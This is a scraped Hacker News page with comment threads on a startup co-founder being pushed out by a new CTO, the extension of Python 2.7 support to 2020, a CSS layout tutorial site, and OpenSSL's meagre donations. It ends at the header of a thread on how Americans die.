Take a deep breath, and think about the future of the company. Whatever products you are developing, would it sustain this harsh world with your skills? This is the whole point of your decision.

TL;DR: if you are bad, leave the dirty job to others.

84
kyleblarson 4 days ago 0 replies      
Tough situation, sorry to hear about it. The comments in the thread are very informative. As I read each comment I'm thinking to myself "is this commenter an engineer / founder / vc / etc" and finding that to be an interesting exercise.
85
joncooper 3 days ago 0 replies      
Are there any of: a legal entity, employment agreements, IP agreements, participation agreements?
86
rajacombinator 4 days ago 0 replies      
This CTO sounds like scum. He may be 100% correct but it's not appropriate for him to suggest you leaving. Your CEO should man up and fire this guy for starting political infighting. Otherwise the CEO will be ousted next.
87
pepon 4 days ago 0 replies      
Fire. CTO. NOW.

You are a co-founder, not an employee. Remember that. It is your company, he works for you. If you would be hired in a company, would you dare to ask the owner of the company to leave?? It doesn't matter how good or bad you are for the company, it is your company!

Fire him now.

88
gojomo 5 days ago 0 replies      
Make sure you've seen 'Startup.com' (documentary) and 'The Social Network' (useful for the archetypes even with the fictions). If you do wind up as an early founder out, try to be more like the guy in Startup.com, or Jawed Karim (YouTube), rather than Ron Wayne (Apple).
89
midas007 4 days ago 0 replies      
Founders need to find more ways to be useful.

If you have the hustle, get going on sales and biz dev.

Because all the coding talent in the world doesn't matter if customers aren't buying or don't know about your app.

90
allworknoplay 4 days ago 0 replies      
This is a tough situation. I have what I think are some relevant recent experiences, but I've signed some agreements and can't just post on the internet. e-mail me at jackphelps at gmail dot com if you want to talk.
91
robertschultz 4 days ago 0 replies      
Agreeing with everyone here. He has definitely overstepped the line and he is not acting like a true CTO. Part of his job is to ensure he instills a high level of trust and support with the team in addition to the rest of his role. Assuming you're an overall good guy, he should do what he can to ensure you stay as part of the company you helped build, be it bad code or not. And if things are not working out, at least provide the path of what you need to do to make it better as the clause. But either way, it sounds like he's just being an ass with an ego.
92
kbruner 4 days ago 1 reply      
I'm confused about your talk of vesting. Founders don't vest, they create the stock and sell/give it to others with a dollar amount or vesting schedule. Are you a founder or an early stage employee?
93
densone 5 days ago 0 replies      
First question I have. Do you at least have a double trigger in your stock agreement.

New CTO / Wants you out. Some stock option agreements have a double trigger where this can make you vest 100%. Make sure to look over it thoroughly.

94
Jean-Philipe 4 days ago 0 replies      
Being a CTO myself and having worked with smart people that were not as good coders, I think that in your case, the new CTO is just looking for a bad excuse to kick you out. Kicking out somebody who knows the system, product, infrastructure or code base from the beginning is generally a bad idea. Also, the line of professionalism between somebody like you (producing unstructured code without tests etc.) and genius like him is thinner than you think. He's either very arrogant or up to something. In any case, he definitely stepped over the line.
95
fluorid 4 days ago 0 replies      
Don't shoot the messenger.

Could it be the CEO/the bizguy who wants you to leave? Could he have brought up the idea? I can hardly imagine that a hired CTO dares to say something like you wrote without backing.

96
rajeevk 5 days ago 0 replies      
IMO, there is no point you try to improve your coding skill at this point of time. As a co-founder, you should try to improve on management skills, try to find replacement of your CTO and then fire him
97
pyrrhotech 4 days ago 0 replies      
dude, you are the founder, he is an employee. You presumably have a lot more control over what happens at the company than he does. If you aren't a great coder, keep learning.
98
jmcdowell 5 days ago 0 replies      
Since he's not asking you to leave the company but instead to stop writing code, is there work to be done elsewhere in the company?

You might find this talk from Ian Hogarth (Songkick) at Hacker News London Meetup quite relevant. He talks about how he would fill a role at Songkick before getting a more specialised person in to fill that role which would see him moving to another completely separate role within the company which needed to be filled.

http://vimeo.com/59187050

99
smprk 4 days ago 0 replies      
You should definitely follow the advice of getting a legal counsel and dealing with the issue now as opposed to later.

Also, you should

1. Clear your thoughts around what you want for your company at this point in time, in the near future, and in the long run.

2. Understand what role you envision yourself and your fellow co-founder playing in the above scheme of things.

3. With thoughts around these two areas cleared up, you should sit and talk about this with your co-founder at the earliest.

100
Im_Talking 3 days ago 0 replies      
I haven't read all comments so excuse me if this has been mentioned, but you should hand in resignation now with minimum of notice period.

You say that you are currently desperately needed now, so your leverage to work-out an equitable legal arrangement with them will never be greater than now. As you said, in 6 months you may not have any leverage.

Just my $0.02.

101
Im_Talking 4 days ago 0 replies      
Sounds like this CTO will have more support than you. Time to move on.

Don't understand why everyone is talking lawyers. I'm sure that you have an equity stake which value will be helped by this new CTO. If you have no equity and (as you say) are a founder, then you are out-of-luck and no legal magic can solve this. Move on and leave on good terms. You never know.

102
napolux 4 days ago 0 replies      
Hire an attorney, and leave with all the shitload of money you can grab from these (not thankful) guys. What does the other cofounder say about this situation?
103
Silhouette 5 days ago 0 replies      
> EDIT: He's not asking me to leave now, since I'm still desperately needed, but in 3-6 months time after we have raised more funding.

Then you are in a relatively strong bargaining position now, but it will probably get dramatically weaker very soon if you do not act.

I agree with those who said you need to take proper legal advice about how secure whatever stake you have in the company really is if they try to take it from you. For example, it is surprising that you mentioned any problems with vesting; as a co-founder, do you not have a certain share of the equity outright? Remember that you are wearing at least two hats here, one as co-founder/investor/equity holder and the other as original chief geek, and hopefully these are completely separate.

In any case, if they need you to get to the big time, then you are in a good position to negotiate mutually acceptable terms for your future and should take immediate steps to do so. It sounds like the best outcome might be a (hopefully amicable) separation, if the professional relationship doesn't look like it has a future, but in that case you're well within your rights to expect fair compensation for anything you're giving up.

But before you do anything else, talk to a lawyer who specialises in this kind of subject, discuss the details of your exact situation, and take advice accordingly.

104
YuriNiyazov 4 days ago 0 replies      
Doesn't he work for you? You are a founder, after all.
105
BigBalli 4 days ago 0 replies      
He does have a point. It's not common because usually higher-ups always remind people who's in charge. It's up to you, but if you decide to stay you need to be more affirmative and build self-esteem.
106
michaelrhansen 5 days ago 0 replies      
As mentioned I would have a lawyer review your contracts thoroughly. When money starts coming in the door, the game changes completely. Situations can be brutal, don't be one of the sad stories.
107
jbverschoor 4 days ago 0 replies      
You hired the right guy, he's technically better than you. Congrats!

So the second part is basically you getting a new job in the company. If there really is no place for you (which I would doubt) then you still keep some equity and go on.

108
Thiz 4 days ago 0 replies      
Stop coding.

Secure your equity.

Get a lawyer.

Fire the CTO.

In that order.

109
hoboerectus 4 days ago 0 replies      
Does the code you write reduce the costs or increase revenue of the business? Get those numbers together and compare them to the rest of development. If they compare favorably, share them with the CTO. If not, find a way to increase them.
110
crater500 5 days ago 0 replies      
First of all the CTO was hired to fix the shit they were hired for. Secondly, that amount of disrespect from a new employee who did not risk anything to start a start-up should be fired immediately. Kick that a-hole to the curb as they will be a cancer in the company.
111
randomflavor 5 days ago 0 replies      
Are you and your partner equal partners? Can you do more stuff on the biz side? product management/dev side? He's prob right, you shouldn't be coding enterprise level delivery with hackery crappy code. Be of service elsewhere or it will be a pain in the ass.
112
bowlofpetunias 4 days ago 0 replies      
And here HN shows its true colors. It's all about competence and meritocracy until it affects a founder.

I've seen companies being run into the ground because founders remained in positions they weren't competent for. My guess is the CTO has seen the same, and he has no intention of taking the fall for that.

No, he hasn't overstepped his boundaries, if this kind of situation continues he may as well hand in his own resignation. He's doing what he's been hired to do.

113
RollAHardSix 4 days ago 0 replies      
He works for you. Tell him to go fuck himself. He's way overstepped his boundaries.
114
sunny1304 5 days ago 0 replies      
Is it possible that you stop writing code for a few months, revisit your programming skill and meanwhile remain active on administration level? If you think your coding is not good, then there is always a chance to improve. And leaving the company is out of question. You have founded it. So you MUST be there because every story doesn't end like Steve Jobs' firing from Apple.
115
darksim905 4 days ago 0 replies      
He's throwing you out & fucking you over. If you're a founder you stay a founder unless you did something horribly bad.
116
tuke 4 days ago 0 replies      
It sounds like you're a good coder . . . because you care. Just saying'
117
beachstartup 5 days ago 1 reply      
there's plenty of other good tactical advice here, but i would like to say something more general:

this is the point in your life where you decide to be a lion, or a lamb. the hyenas are circling and they're not going away.

118
notastartup 4 days ago 1 reply      
He has NO point. He has no right to mouth you off like this. Take a cue from The Social Network.

    [leans down close to Mark, his voice low and dangerous]
    And I'll bet what you hated the most was that they
    identified me as a co-founder of Facebook, which I am.
    You better lawyer up asshole, because I'm not coming
    back for 30%, I'm coming back for EVERYTHING.
    [backs away from Mark slowly, still looking at him]

Hint, that is what you should be getting ready to do. If he runs his mouth like this again, fire his ass, he's trying to snake his way in.

119
whatevsbro 4 days ago 0 replies      
Try and find out if the CTO is the only problem, ie. he's not conspiring with the other founder.

If the CTO is acting alone, get rid of him and continue with the business. If not, ruin their fundraising chances, cut your losses and move on to bootstrap a business on your own.

A prolonged fight won't do you any good.

120
innocentius 4 days ago 0 replies      
Have you read Kafka's The Trial?
121
jesusmichael 4 days ago 0 replies      
Wow... now that is a pickle.

Take a step back. Is his criticism sound? If in a perfect scenario, where you had a real development team, would you be the weak link? Is that true?

If the answer is yes... and you still feel passionately about the work the company is doing. Talk to your partner and find a position you can transition into. Don't hold back the company's progress because you want your own private lesson in enterprise development.

If it's not... Discuss firing this guy immediately... Nothing will destroy a company faster than disharmony among the core group. You and your partner have to be on the same page. There cannot be a little birdie sowing the seeds of insurrection. Hand this guy his hat and find someone else. Don't think about it just do it.

Only do this after you've thought thru his comments and objectively come to a conclusion about them. Consultants are paid to deliver the hard truth, and sometimes it may sting, but you'll get over it.

If it's time for you to leave... or that's the direction it's headed. Get your equity memorialized fast while you're needed... don't let anyone sleep on that.

Good luck kid...

122
hackchir 4 days ago 0 replies      
Fire the CTO, asap!

Do not underestimate yourself, you can code and be very helpful to the company. You definitely do not need that type of CTO at this point.

Comments like "your code is not good enough" are completely subjective and if anything show malicious intent to cut you off.

I would talk to a lawyer in terms of what is the best way to do it though, such that you can maintain your equity and influence in the company.

DO NOT let that a-hole take advantage of your hard work and dedication you have put in your OWN company!

15
Extend Python 2.7 life till 2020 python.org
350 points by oal  4 days ago   278 comments top 36
1
drewcrawford 4 days ago 4 replies      
There are a lot of comments here from people who aren't on the python-dev list and don't really understand what this diff actually means.

The core developers are not required to maintain 2.7 post-2015, and most of them won't be involved in it. That part hasn't changed.

What is happening is that Red Hat is preparing to cut a RHEL 7 release, which AFAIK depending on how much you pay them they support for 13 years. So they will need to figure out how to support 2.7 themselves at least through 2027.

Here is where I am reading between the lines. RH are well within their right to fork Python and keep their maintenance patches to themselves and their customers (Python's not copyleft). But, they are nice guys and so maybe they are willing to upstream their changes at least for awhile if there is still a Python project willing to accept them. Again, this is my speculation based on the ML discussion, not what RH has actually said they will do.

An analogy can be made to Rails LTS, a commercial fork of Rails 2.x that patio11 was involved in [0]. Inevitably somebody is going to step in to support 2.7, and so let's see what we can do to avoid a situation where the only way to keep running 2.7 is to subscribe to RHEL.

Meanwhile, there are some large companies that use 2.7 extensively on Windows (e.g. Enthought, Anaconda) and the thinking goes that somebody can probably be found to produce a Windows installer once in awhile, assuming that Python.org will still host a download.

So really what is happening here is not very exciting. The core committers aren't doing anything different than leaving the project as originally planned. What is happening is that they will leave the lights on in the source control repository and on the FTP server, so as to capture the free labor from people at large companies who have an interest in continuing to support 2.7.

The alternative is that RH and other vendors create proprietary and expensive forks of Python 2.7. That may end up happening anyway, but it will take longer for your employer to notice you should stop contributing your patches back if binaries still appear on python.org and you don't have to ask IT to set up SCM and a bug tracker, etc.

[0] http://www.kalzumeus.com/2013/06/17/if-your-business-uses-ra...

2
chimeracoder 4 days ago 7 replies      
This is really disappointing to see - I fear that it will slow adoption of Python 3 even further, when it was just reaching a tipping point[0].

When I first learned Python, I learned Python 3 first because it was newer, and I figured everyone would be using it soon enough. Little did I know that Python 2 would continue to be supported for over ten years after that!

Some people make a big deal about figuring out "which" Python to learn - that's not really much of an issue, because Python 3 isn't so different from Python 2 that it's hard to pick up the other very quickly (especially given how much has been backported to 2.7). But it's unfortunate to see people continuing to write new code in Python 2.

[0] http://python3wos.appspot.com/

3
Udo 4 days ago 3 replies      
Speaking as a Python outsider, this looks pathological. If backwards compatibility is such a big hindrance in switching from 2 to 3, why not ship a v2 legacy fallback interpreter along with the new stuff? If you wanted to make it fancy, you could even make a 3-to-2 bridge that allows people to run v2 code from v3.

Am I missing something here?

4
eliben 4 days ago 2 replies      
I think many folks are reading too much into this. "Extended lifetime" is bug-fixes. The final planned release is 2.7.9 in 2015 - beyond that there will be source-only releases for major security problems. No new features, no non-critical bug fixes.

So this isn't really making Python 3 any less appealing. But the Python core developers cannot with a calm heart abandon all the users of 2.x, given the state of adoption today.

5
yason 4 days ago 3 replies      
How I'm not surprised.

Python 3 didn't offer anything that would have been so useful and desirable that people would've jumped on it the moment it was released. In fact, it was actually a bit worse than Python 2 when it was out and those Python 2 users could continue enjoying loads of libraries to go with, and of course they knew how to navigate around Python 2's quirks so why bother. Sadly, this is still what I think of Python 3: "Why bother?".

Python 3 didn't have enough to warrant a 'v3', really: Python 3 could've just been Python 2.7 if it wasn't for the religious backwards compatibility in Python, which, ironically seems to matter a lot. The syntactic and semantic differences weren't big enough that Guido couldn't have worked around the most important improvements into 2.x line and dropped less relevant stuff (like removing 'print' statement etc).

Even if Python 2.7 would've needed some changes to existing libraries, the psychological barrier would've been lower. It's about "Fixing my lib to work with Python 2.7 which is top of the line today" versus "Porting my lib to Python 3.0 which will be the official Python in a few years": guess which one sounds more appealing? Note that the amount of work in both cases wasn't that big.

I think mainstream Python will be 2.x till Python 4 is out.

6
wirrbel 4 days ago 0 replies      
The best way would be to release a python 2.9 which incorporates most of the changes from 2 to 3 but the unicode change.

The between Python 2 and Python 3 was just too wide. Even with breaking changes, with a small people will just migrate eventually. Migrating projects drag each other over the "barrier" just like water in a hose can be sucked over a wall.

The issue definitely was not the print command, but other things such as ``iteritems()``, etc - by themselves not much to keep you from migrating, but there is a pile of these boring changes next to the big one (unicode).

I think Guido overestimated the appeal of the new unicode handling and underestimated how resentful people are to change. I figure that at least 1/4 of programmers are actually very opposed to each and every migration and a new version has to have enough incentives to counterbalance this built-in conservativeness.

7
crusso 4 days ago 5 replies      
I just got back into some Python programming after a 2+ year hiatus from the language.

I'm stunned that this 2.x vs 3.x debate is still happening and that 99% of all libraries in use* haven't been converted to 3.x. I like the language, but ... damn... If it weren't for the scikit/numpy stuff, I'd stick with Ruby. The Ruby community seems much less fragmented and wants to see the language move forward. It helps a lot that the 800 pound gorilla, Rails, keeps up with Ruby releases.

edit:* By that, I mean that the conversion rate for commonly used libraries hasn't hit 99%.

8
makmanalp 4 days ago 5 replies      
I see many comments talking about how this will slow down the migration process. But I don't think the situation is that bad.

Most of the py3 wall of superpowers is now green (https://python3wos.appspot.com/) with boto, mysql-python, nltk, python-openid being some of the rare few in terms of not having great py3 alternatives. And most of these have ports on the way already.

So one interesting effect of this is that now that there is some critical mass and people are starting new projects in python3, there is now pressure on package maintainers to have py3 ports. So it's users dragging the packages forward now rather than the packages dragging the users backwards.

9
overgard 4 days ago 2 replies      
The lesson here is that it's important to "sell" new versions of anything. You can't just expect people are going to upgrade because it's the new hotness. Older versions of your own software are often your biggest competitor. (See also: Microsoft and Windows 8).
10
TazeTSchnitzel 4 days ago 4 replies      
Oh for god's sake. Kill the damn thing already.

PHP 4 to 5 was a massive leap compared to Python 2 to 3, but they actually made that leap!

11
shadowmint 4 days ago 0 replies      
To be fair, what was the reasonable alternative?

Cede control of python 2.x to vendors who continue to demand support and bug fixes?

That would be a disaster; it'd be a moment away from new features and a 2.8 'cant believe its not python'.

12
reality_czech 4 days ago 3 replies      
This is the path that all dynamically typed scripting languages must follow. Over time, change becomes impossible because the lack of typechecking or static analysis tools means that any change might break something in a subtle and hard-to-diagnose way. And so the language grows by accretion. You end up with something like bash or perl, where there are a million ways to do any one thing. Each way was added at a particular phase of the language's life, and it could never be removed after that. And so the language becomes difficult to learn and unattractive to newcomers, so another scripting language pops up, and the cycle of life begins again.

Compare this to a language like golang, where you can just run "go fix" on your code to update it to the latest version. And you don't have compatibility hell, because when you distribute your application, it's a standalone binary. Stuff like go is the future. Get off the dynamic language hamster wheel.

13
username223 4 days ago 0 replies      
Good news. They have another 5-6 years to recognize their mistake and cut Python 3 loose from Python, like Perl did with Perl 6. It's interesting how the same underlying mistake manifests itself in different cultures: Perl 6 was "we'll break all your code, but give you gonzo new features that we hope are useful." Python 3 was "we'll break all your code, but soothe some pedants and browbeat you into accepting the result."
14
borplk 4 days ago 2 replies      
Damn. I hope my grandchildren see the day when Python 3 is commonplace.
15
Ellipsis753 4 days ago 1 reply      
I just thought I'd like to know what Hacker News thinks. Will Python 2.x ever die?

I'm still writing lots of code with it and even quite a lot of new code. It's been around for ages and it feels like almost no libraries have been ported to 2.x yet. On a couple of occasions I've started a project with Python 3.x just to drop it or move to Python 2.x as a library I need doesn't seem to exist for Python 3.x and I don't want to port it over myself. I've never had this issue with 2.x (no libraries support 3.x only.)

Most Python 3.x "killer features" have been back-ported to Python 2.x and I honestly feel little reason to upgrade myself now. When support for Python 2.7 is officially dropped we could fork it and continue. I would hope it wouldn't take huge amount of effort for some people to support it? Just fix bugs and security issues and take pull requests? In that way might Python 2.x even outlive Python 3.x or at least remain more popular?

16
PythonicAlpha 4 days ago 1 reply      
This is a result of some not so optimal design decisions in the past.

I remember, when Py3 first came out, everything was incompatible -- unnecessary incompatibilities like the u" notation for Unicode string literals that was dropped. Unnecessary incompatibilities in the C-extension-module implementation layer. And so on. The list of incompatibilities was just huge.

Later several of them were dropped, like the string literal trouble ... But then the trouble was already done. Many extension modules were not lifted to the new version, since the overhead was too big.

I think, many more projects would have adopted Py3, if more extension modules would support it.

The huge library of extension modules was always the strength of Python. Now we have many projects still running on Py2, because Py3 did ignore this strength.

17
piokuc 3 days ago 0 replies      
Years ago, when I first heard about Python 3 and plans to improve the language my first thought was "Yes! Multi-line lambdas are coming!", then I started reading more and found out that Guido actually wanted to _remove_ lambdas altogether. I still remember the state of shock I was in after reading that, and a sinking feeling.

The lambdas stayed, fortunately, but, unfortunately, I'm still convinced the whole project was a bad idea. The cosmetic changes which make Python 3 incompatible with Python 2.7 are just not worth the trouble of breaking the compatibility. Has anybody ever tried to estimate the man-hours needed to port the myriads of great Python 2.7 libs to Python 3 and weigh it against the advantages of subtle language improvements? I don't think so. Plus, the big Python's problems like GIL are still there in Python 3...

If it was up to me I would drop Python 3 and focus the development effort of the community on improving PyPy and porting libraries to it.

18
andr 4 days ago 3 replies      
Since there still won't be a Python 2.8, I read this as the mainstream Python not evolving one bit for the next 6 years. For me, this would be grounds for moving to a different language.
19
undoware 4 days ago 0 replies      
...also, he's renamed it "Python XP"
20
dehrmann 4 days ago 0 replies      
The Python shop I used to work at, and this is a shop with some pretty big fanboys and apologists, wasn't able to upgrade because of library support, and these are people who would like to.
21
bmoresbest55 4 days ago 1 reply      
I understand that changing to Python 3 can be expensive but really all that any company or person is doing is prolonging the inevitable. If they have a good product/app/etc. that will last it will have to change to Python 3 and sometime in the future, right? Why keep waiting? Why support something that is considered by its makers to be inferior? I really would like answers to these questions, if someone is willing.
22
gaius 4 days ago 1 reply      
By 2020 everyone will have moved onto OCaml anyway.
23
danso 4 days ago 1 reply      
For reference's sake:

Python 2 was released Oct. 2000 and so will have a 20-year lifetime now. http://en.wikipedia.org/wiki/Python_(programming_language)#H...

Ruby 1.8, which was retired last year, had 10 years of life: https://www.ruby-lang.org/en/news/2013/06/30/we-retire-1-8-7...

Obviously, version numbers don't mean the same thing...and Ruby 1.8.x to Ruby 1.9.x (or even 2.x) seems less of a jump than 2.x to 3.x.

24
ishbits 4 days ago 2 replies      
Anyone know if RHEL 7 will ship with Python 3 in the base, even if not default? That could go a long way to boosting Python 3 adoption.

I know it's in SCL, but that lacks convenience for a lot of users.

25
lucb1e 4 days ago 4 replies      
This seems weird to me. Won't this cause a fork in Python at some point, where the 2.7 developers continue on 2.8 or rename it entirely, and another fork continues on what is now Python 3?
26
Walkman 4 days ago 0 replies      
I just purged Python 3 from my computer. Will not serve much in the next 5 years I guess...
27
stefantalpalaru 4 days ago 1 reply      
I still want to see a Python 2 fork getting the care it deserves. I don't trust the motivations of its current developers.
28
andhess 4 days ago 2 replies      
Wow I'm very disappointed. I keep making the effort to transition more to 3, but am frustrated to see so many dependencies only work with 2.7, and thus maintain both libraries. I am tired of this limbo.
29
estebanrules 4 days ago 0 replies      
Can anyone point me in the right direction of an article that sums up how this whole fragmentation started? I'm curious to know the history.
30
gkya 4 days ago 0 replies      
Which kind of means forever?
31
sigzero 4 days ago 0 replies      
That is a huge mistake.
32
estebanrules 4 days ago 0 replies      
I really thought this thread was a prank or joke when I saw the title. Sadly, it's not. The whole 2.7 / 3.x debacle is a large part of why I have more or less stopped coding in Python and moved on to Ruby. The community is a large part of it as well.
33
crimsonalucard 4 days ago 0 replies      
This is like windows XP.
34
ssweens1 4 days ago 1 reply      
Viva la 2.7!!!
35
mirsimiki 4 days ago 0 replies      
open a shell and type 'import antigravity'
36
SEJeff 4 days ago 3 replies      
Python 2.7.7 aka the Duke Nukem Forever edition!
16
Learn CSS Layout learnlayout.com
345 points by ScottyE  6 days ago   25 comments top 16
1
asb 5 days ago 0 replies      
I've also found The Magic of CSS useful: http://adamschwartz.co/magic-of-css/
2
olegkikin 5 days ago 0 replies      
You need to explain what things do.

This page, for instance, doesn't explain what flexbox does.

http://learnlayout.com/flexbox.html

3
alanfalcon 5 days ago 1 reply      
I'd like to give a big sloppy wet kiss (or just a high five) to ScottyE for linking this. I always felt like I walked in halfway through the CSS story and like I just needed to play catchup through trial and error because try as I have, I've failed to find a resource as clear as this. In short, as a designer who never really learned CSS properly before today, this is a godsend. Thanks.
4
rafeed 5 days ago 0 replies      
Well done. Everything is accurately explained using simple terminology. I'd love to see this expand beyond just layouts. CSS is overwhelming to beginners, but this is dead simple while still delving into deeper, more complex topics.
5
MCarusi 5 days ago 0 replies      
I don't know where I'd be without http://css-tricks.com/ - great site and super helpful forums.
6
subir 5 days ago 1 reply      
This was on HN some time last week: https://news.ycombinator.com/item?id=7521180

Good site, though.

7
nebulous1 5 days ago 1 reply      
Page 2: "it wouldn't make sense to make an inline div"

Page 15: makes inline divs.

:)

8
Ellipsis753 5 days ago 0 replies      
This is a great tutorial and helps me a lot by just reminding me of things.

There's a mistake at http://learnlayout.com/float-layout.html though where they talk about clearfix and how they are using it without actually using it on that page. I just thought I'd say that here in case the author reads it.

9
owenversteeg 5 days ago 0 replies      
This site is great for teaching CSS layout skills. Next time someone asks me, I'll refer them here.

I especially like how it references caniuse for each property it discusses. Nice work!

10
geekam 5 days ago 1 reply      
I really like CSS Mastery: Advanced Web Standards Solutions by Collison, Budd, Moll.
12
prohor 5 days ago 0 replies      
I wish I had this when I was figuring out how it all works. I'll definitely point it to friends who start with CSS.
13
rduchnik 5 days ago 2 replies      
For the clearfix can't you just use `clear:right` or `clear:both`? Also for inline-block you can also use the ie7 hack `display: inline-block;*display: inline;zoom: 1;`. Nice tutorial though.
14
Rzor 5 days ago 0 replies      
If anyone wants a complete view of the picture, there is htmldog[1], which covers CSS, HTML and JS.

[1] - http://htmldog.com/guides/

15
guh_me 5 days ago 1 reply      
Really cool, another quality resource to help kill W3Schools.
16
mfeldheim 5 days ago 0 replies      
Awesome work, thanks for sharing that link
17
In a typical year the OpenSSL project receives about US $2000 in donations groups.google.com
344 points by blazespin  6 days ago   161 comments top 22
1
AaronFriel 6 days ago 3 replies      
What other people have said in comments is completely right: OpenSSL, or maybe just this Steve Marquess guy, is missing the forest for the trees. Or in this case, the six figure donations for the pennies. OpenSSL could raise more money in a few months of panhandling in a major city than they raise in a year[1].

A student group that I will soon be President of at the University of Northern Iowa[2] received more in donations and financial support. Our student group is not the best managed, but we care a lot about large sponsors, keeping good relations with them, and making asks that matter.

If someone told me that panhandlers and Midwest student organizations are out-fundraising OpenSSL, I would scoff and laugh. OpenSSL? That's mission-critical software running on nearly every PC and post-PC device in the world. You know what OpenSSL reminds me of in this respect? SQLite.

SQLite charges $75,000 for consortium members[3] to have 24/7 access to phone support direct to developers, guaranteed time spent on issues that matter to them, and so on.

The fact that this doesn't exist for OpenSSL is an embarrassment to project management. I made an offer in that email thread to try to raise $200,000 for OpenSSL by the end of 2014, and I'm repeating it here for visibility:

If you are an employee of a corporation that wants to donate to directly support OpenSSL development by funding staff time, send me an email right now: friela@uni.edu

If you are in the OpenSSL foundation, send me an email right now and I will try to solve your problem by finding a phone number at every major OpenSSL using corporation and making an ask. Want me to do that? Send me an email right now: friela@uni.edu

[1] http://www.ncbi.nlm.nih.gov/pmc/articles/PMC121964/

[2] http://www.unifreethought.com

[3] http://www.hwaci.com/sw/sqlite/prosupport.html

[4] https://sqlite.org/consortium.html

2
patio11 6 days ago 4 replies      
Note the almost painfully predictable response to the thread. Instead of focusing on how OpenSSL can pull in, let me pick a number, $800k in revenue in the next year, they immediately zero in on $70 of Paypal fees as the organization's leading financial problem.
3
tptacek 6 days ago 5 replies      
A sponsored bug bounty might be just as useful as more money directly to the project (especially if Google is porting Chromium to it). The nice thing about sponsoring a bug bounty is that anybody can do it; it doesn't require coordination with the project.
4
Nelson69 6 days ago 0 replies      
The donations are one aspect. I'm on the dev mailing list, been lurking for a few years, I've used openssl for various things for years and I have had an interest in when some newer TLS standards were going to be supported. It's a pure bazaar as best I can tell. It's nearly magical how releases happen. I don't know if there is a secret mailing list for the core developers or some IRC channel or something, people post patches to the list, there are some occasional questions and answers, it's insanely low volume for a project as popular as it is. Every now and again some big patches with a lot of new stuff drop. Every now and again someone ponies up some big money and FIPS certification happens. It just sort of keeps meandering along without a benevolent dictator.
5
kenrikm 6 days ago 2 replies      
Wow, I'm surprised that someone that's so crucial to the well being of so much of our internet security is funded on $2000/year in donations. I think I'm going to start donating more to stuff like this.
6
saurik 6 days ago 3 replies      
So, first: I agree with patio11. But past that, this thread also bugs me because it is so ill-informed: the very first question that has to be asked is "what is the distribution of donation amounts", as the way to minimize processing fees of "we got one donor who gives almost $2k, and then a handful of people we choose not to turn away who give a few dollars each" is very different than how you handle "we have $2k donors, they all give a dollar". PayPal's micropayment fees are $0.05+5%, which is a massive difference from the default $0.30+2.9% quoted.

And if you have only one really large donor, you get them to give you a check. And then you put their name somewhere. And you send them some thank you letters. And you ask for their advice on how to talk to their friends, as maybe they might also want to donate. Because patio11 is just dead-on right: it is more useful to increase the incoming money here, not avoid losing some fees :/. But again: even if we choose to nitpick fees... this conversation is still going nowhere if the distribution of donations and the process of receiving them (if you have mostly random donations, having them do bank transfers is going to massively increase the loss rate ;P) is not where the discussion started.

7
paulbaumgart 6 days ago 7 replies      
Soo, throwing a little bit of economics out there: BSD-licensed open source software is pretty much a Public Good (http://en.wikipedia.org/wiki/Public_good). There are basically two ways we've figured out how to create public goods: taxation and assurance contracts (like Kickstarter).

Thoughts on the pros and cons of either approach with respect to improving information security infrastructure?

8
socalnate1 6 days ago 0 replies      
I'm surprised I haven't seen anyone mention the "tragedy of the commons" economic theory yet. Though in this case it seems to be happening in reverse, rather than depleting the common resource, we are all neglecting to invest in it.

http://en.wikipedia.org/wiki/Tragedy_of_the_commons

9
wnoise 5 days ago 0 replies      
That's unfortunately still too much. Raising any more money will only delay the death of a project that has suppressed the use of better written projects by dominating that niche in the ecosystem due to first-mover advantage.
10
higherpurpose 6 days ago 1 reply      
Shameful that so many billion dollar corporations rely on it in such a vital way, and only so little is being donated to it.

I think we need a score card for donating to open source projects, in the same way we have score cards for using green materials in devices, or using renewable energy for data centers. We should see periodic reports of how much money these companies donated to open source projects.

11
dpweb 6 days ago 0 replies      
The OpenSSL debacle exposes a real problem with Open source sw. There is massive financial incentive to break it, none to make it safe. Funding its dev does little. Fund guys to break it who will tell you how they did it.
12
mercurial 6 days ago 0 replies      
My usual suggestion would be "that's part of the infrastructure, so governments should get together and foot the bill", but this approach doesn't work for this particular use case.
13
btbuilder 6 days ago 0 replies      
I'm interested in how the payments by third-party companies to OpenSSL foundation for white labeled FIPS-mode OpenSSL are accounted for. Maybe it's a separate entity?
14
lazylizard 6 days ago 0 replies      
i think, generally, the tendency to think openssl needs help right after seeing openssl need help is..ignoring the problem that there might be other projects similar to openssl, who need help. it's like donating to 1 disaster victim because she appeared in a news story. this thing should be left alone and looked into after a few months (i don't know how long it takes for people to forget, actually) of no stories in the press about openssl.

otoh, if there were a foundation that collected money and funded many projects..it'd look like apache perhaps..

personally, i wouldn't mind an option to donate to apache or openssl in a humblebundle, nor do i mind an option to stick a donate button/widget on my website..or even better, have the widget rotate recipients..

15
betadreamer 6 days ago 0 replies      
I'm very surprised how low the donation is. This proves that OpenSSL was maintained more from contribution / volunteer rather than professionally. No wonder why they were not the first one to find the heartbleed bug...
16
dalek2point3 6 days ago 0 replies      
this might not necessarily be a good thing. see: http://en.wikipedia.org/wiki/Motivation_crowding_theory
17
jokoon 6 days ago 1 reply      
Why not rewrite the whole thing ?
18
keithgabryelski 6 days ago 0 replies      
it's time for the community (and possibly all major opensource projects) to have code review parties.

1 week before, a module is declared the subject. at the time of the party, the major owners are on the hook for function by function questions, and line by line when it merits.

reddit? or even a special github community service.

19
nobodyshere 6 days ago 2 replies      
Is it so vaguely undervalued or does it just work so well that it does not need too much improvement?
20
teemo_cute 6 days ago 1 reply      
OpenSSL is like a guardian angel who's invisible to a person. The guardian angel has been helping the person all the time even though he/she doesn't know it. Then the time came that the guardian angel made a little unintentional mistake that led to large consequences. The person then starts blaming the guardian angel, forgetting all the good things the angel has done for him/her.
21
ry0ohki 6 days ago 6 replies      
Dumb question perhaps, but what do they need money for? What would they use it for? It says they pay it out to team members, but if people are doing this work for the money, doesn't that defeat the point?
22
raverbashing 6 days ago 2 replies      
Underfunding is not an excuse for a code that gives headaches to people, lack of testing and blind acceptance of "new features" just for the sake of it.
18
How Americans Die bloomberg.com
336 points by minimax  15 hours ago   133 comments top 30
1
tokenadult 12 hours ago 3 replies      
